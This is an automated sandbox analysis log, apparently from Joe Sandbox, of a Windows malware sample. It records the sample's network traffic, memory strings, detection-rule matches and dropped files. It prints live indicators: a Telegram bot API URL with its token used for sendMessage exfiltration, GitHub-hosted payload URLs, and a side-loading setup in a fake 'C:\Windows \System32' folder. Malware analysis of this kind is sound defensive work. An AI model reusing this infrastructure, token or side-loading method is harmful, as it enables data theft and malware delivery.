          Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 0000001C.00000002.3269556745.00007FF8A7DCB000.00000002.00000001.01000000.00000010.sdmp
          Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 0000001C.00000002.3270312205.00007FF8B8B18000.00000002.00000001.01000000.0000000D.sdmp, libpq.dll.13.dr
          Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 0000001C.00000002.3270312205.00007FF8B8B18000.00000002.00000001.01000000.0000000D.sdmp, libpq.dll.13.dr
          Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: svchost.exe, 0000001C.00000002.3270413285.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 00000022.00000002.2597062876.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002C.00000002.2623385168.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp
          Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmp, libssl-3-x64.dll.13.dr
          Source: Binary string: ucrtbased.pdb source: ucrtbased.dll.13.dr
          Source: Binary string: PrintUI.pdb source: xcopy.exe, 00000008.00000002.2186107127.000001C43773B000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000A.00000002.2213277015.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000002.2687703393.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000000.2216782494.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe.8.dr
          Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmp, libssl-3-x64.dll.13.dr
          Source: Binary string: PrintUI.pdbGCTL source: xcopy.exe, 00000008.00000002.2186107127.000001C43773B000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000A.00000002.2213277015.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000002.2687703393.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000000.2216782494.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe.8.dr
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74713C568 FindClose,FindFirstFileExW,GetLastError,34_2_00007FF74713C568
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74713C5DC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,34_2_00007FF74713C5DC
          Source: C:\Users\user\Desktop\app64.exeCode function: 4x nop then push rbx0_2_00007FF7DF1146C6

          Networking

          barindex
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficTCP traffic: 192.168.2.5:49946 -> 188.116.21.204:5432
          Source: global trafficHTTP traffic detected: GET /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioAccept: */*
          Source: global trafficHTTP traffic detected: GET /resolve?name=unvdwl.com HTTP/1.1Host: dns.googleAccept: */*
          Source: global trafficHTTP traffic detected: GET /resolve?name=rootunvdwl.com HTTP/1.1Host: dns.googleAccept: */*
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
          Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
          Source: Joe Sandbox ViewIP Address: 140.82.121.4 140.82.121.4
          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
          Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownDNS query: name: ipinfo.io
          Source: global trafficHTTP traffic detected: POST /bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: api.telegram.orgContent-Length: 94Expect: 100-continueConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9311C20 BIO_ADDR_clear,BIO_ADDR_clear,ERR_set_mark,BIO_recvmmsg,ERR_peek_last_error,BIO_err_is_non_fatal,ERR_pop_to_mark,ERR_clear_last_mark,ERR_clear_last_mark,28_2_00007FF8A9311C20
          Source: global trafficHTTP traffic detected: GET /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioAccept: */*
          Source: global trafficHTTP traffic detected: GET /resolve?name=unvdwl.com HTTP/1.1Host: dns.googleAccept: */*
          Source: global trafficHTTP traffic detected: GET /resolve?name=rootunvdwl.com HTTP/1.1Host: dns.googleAccept: */*
          Source: global trafficDNS traffic detected: DNS query: github.com
          Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficDNS traffic detected: DNS query: rootunvbot.com
          Source: global trafficDNS traffic detected: DNS query: ipinfo.io
          Source: global trafficDNS traffic detected: DNS query: unvdwl.com
          Source: global trafficDNS traffic detected: DNS query: dns.google
          Source: global trafficDNS traffic detected: DNS query: rootunvdwl.com
          Source: unknownHTTP traffic detected: POST /bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: api.telegram.orgContent-Length: 94Expect: 100-continueConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Wed, 30 Oct 2024 10:29:54 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: no-referrer-when-downgrade
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 96CF:2880F0:110F41E:128DF92:67220ADDAccept-Ranges: bytesDate: Wed, 30 Oct 2024 10:30:57 GMTVia: 1.1 varnishX-Served-By: cache-dfw-kdal2120109-DFWX-Cache: MISSX-Cache-Hits: 0X-Timer: S1730284257.426488,VS0,VE85Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 5f8a816a393c558f9f4badd0a02981015de93158Expires: Wed, 30 Oct 2024 10:35:57 GMTSource-Age: 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:30:08 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:30:14 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:30:27 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-alive
          Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.26.192.52/un2/urestorehard.dat
          Source: powershell.exe, 00000028.00000002.2570675567.0000018003DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
          Source: powershell.exe, 00000028.00000002.2570252643.0000018001535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftk
          Source: powershell.exe, 00000003.00000002.2218673511.000002712643C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
          Source: svchost.exe, 0000001C.00000002.3267456047.0000000064953000.00000008.00000001.01000000.00000012.sdmpString found in binary or memory: http://mingw-w64.sourceforge.net/X
          Source: powershell.exe, 00000003.00000002.2248920872.0000027134EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000003.00000002.2218673511.0000027126477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
          Source: powershell.exe, 00000010.00000002.2251089599.000001F4CA22B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2251089599.000001F4C9078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000003.00000002.2218673511.0000027124D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2251089599.000001F4C8E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.00000180033D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000010.00000002.2251089599.000001F4CA22B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2251089599.000001F4C9078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000003.00000002.2218673511.000002712635C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unvdwl.com/un2/botprnt.dat
          Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://unvdwl.com/un2/urestorehard.dat
          Source: powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: svchost.exe, 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpString found in binary or memory: http://www.gnu.org/licenses/
          Source: svchost.exeString found in binary or memory: http://www.zlib.net/
          Source: svchost.exe, 0000001C.00000002.3270431776.00007FF8BA257000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 00000022.00000002.2597133834.00007FF8BA257000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002C.00000002.2623418463.00007FF8BA257000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.zlib.net/D
          Source: powershell.exe, 00000003.00000002.2218673511.0000027124D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2251089599.000001F4C8E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.00000180033AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.0000018003377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000028.00000002.2570675567.0000018003E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
          Source: powershell.exe, 00000028.00000002.2570675567.000001800372A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegra
          Source: powershell.exe, 00000028.00000002.2570675567.0000018003664000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
          Source: powershell.exe, 00000028.00000002.2570675567.000001800372A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.
          Source: powershell.exe, 00000028.00000002.2570675567.000001800372A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.o
          Source: powershell.exe, 00000028.00000002.2570675567.000001800372A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.0000018003664000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.or
          Source: powershell.exe, 00000028.00000002.2570675567.0000018003861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: powershell.exe, 00000028.00000002.2620974839.000001801B64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
          Source: powershell.exe, 00000028.00000002.2570675567.0000018003664000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/b
          Source: powershell.exe, 00000028.00000002.2570675567.00000180037FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7985
          Source: printui.exe, 0000000D.00000002.2687540971.0000020E692D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessJO
          Source: powershell.exe, 00000028.00000002.2570454684.0000018002E30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage
          Source: powershell.exe, 00000028.00000002.2567151922.00000180012EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage.dll
          Source: powershell.exe, 00000028.00000002.2567151922.00000180012EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessagea$
          Source: powershell.exe, 00000028.00000002.2620911550.000001801B540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessage
          Source: powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/
          Source: svchost.exe, 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 00000022.00000002.2596558102.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623260708.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://curl.se/V
          Source: svchost.exe, svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
          Source: svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
          Source: svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/docs/copyright.html
          Source: svchost.exe, 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 00000022.00000002.2596558102.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623260708.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://curl.se/docs/copyright.htmlD
          Source: svchost.exe, svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
          Source: svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/docs/hsts.html#
          Source: svchost.exe, svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
          Source: svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
          Source: x590769.dat.13.drString found in binary or memory: https://dns.google/resolve?name=
          Source: powershell.exe, 00000003.00000002.2218673511.000002712635C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2218673511.0000027126437000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
          Source: powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmai
          Source: powershell.exe, 00000003.00000002.2218673511.000002712635C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/main/un2/botprnt.dat
          Source: svchost.exe, 0000001C.00000002.3268822127.000001D8E7813000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/uamd.dat
          Source: svchost.exe, 0000001C.00000002.3268859281.000001D8E7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/ucpu.dat
          Source: svchost.exe, 0000001C.00000002.3268859281.000001D8E7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/ucpusys.dat
          Source: svchost.exe, 0000001C.00000002.3268822127.000001D8E7813000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/unv.dat
          Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/un2/uusb.dat
          Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.dat
          Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.datf
          Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.datpt:
          Source: powershell.exe, 00000003.00000002.2218673511.000002712595C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.0000018003861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: svchost.exe, 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmp, x590769.dat.13.drString found in binary or memory: https://ipinfo.io/json
          Source: svchost.exe, 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmp, x590769.dat.13.drString found in binary or memory: https://ipinfo.io/jsonhardware_manager::download_json_error:
          Source: powershell.exe, 00000003.00000002.2248920872.0000027134EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000003.00000002.2218673511.0000027126460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
          Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/
          Source: svchost.exe, 0000001C.00000002.3269141211.000001D8E78F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/main/ubotrestorehard.dat
          Source: powershell.exe, 00000003.00000002.2218673511.0000027126460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dat
          Source: svchost.exe, 0000001C.00000002.3267873513.00000000660F4000.00000008.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.gnu.org/licenses/
          Source: svchost.exeString found in binary or memory: https://www.openssl.org/
          Source: svchost.exe, 0000001C.00000002.3270095241.00007FF8A9391000.00000002.00000001.01000000.0000000F.sdmp, svchost.exe, 0000001C.00000002.3269701868.00007FF8A7ECE000.00000002.00000001.01000000.00000010.sdmp, libssl-3-x64.dll.13.drString found in binary or memory: https://www.openssl.org/H
          Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
          Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
          Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49885 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49965 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49985 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:49994 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:49997 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:50005 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:50008 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50011 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50014 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:50017 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:50020 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50024 version: TLS 1.2
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B8372B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,28_2_00007FF8B8372B80
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B8372B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,34_2_00007FF8B8372B80

          System Summary

          barindex
          Source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 6620, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\pyld.dllJump to dropped file
          Source: C:\Users\user\Desktop\app64.exeCode function: 0_2_00007FF7DF113E38 NtClose,0_2_00007FF7DF113E38
          Source: C:\Users\user\Desktop\app64.exeCode function: 0_2_00007FF7DF113E44 NtCreateUserProcess,0_2_00007FF7DF113E44
          Source: C:\Users\user\Desktop\app64.exeCode function: 0_2_00007FF7DF113E5C NtDelayExecution,0_2_00007FF7DF113E5C
          Source: C:\Users\user\Desktop\app64.exeCode function: 0_2_00007FF7DF113E68 NtQuerySystemInformation,0_2_00007FF7DF113E68
          Source: C:\Windows\System32\cmd.exeFile created: C:\WindowsJump to behavior
          Source: C:\Windows\System32\cmd.exeFile created: C:\Windows \System32Jump to behavior
          Source: C:\Windows\System32\xcopy.exeFile created: C:\Windows \System32\printui.exeJump to behavior
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\usvcldr64.datJump to behavior
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\winsvcfJump to behavior
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\winsvcf\winlogsvcJump to behavior
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to behavior
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to behavior
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to behavior
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to behavior
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to behavior
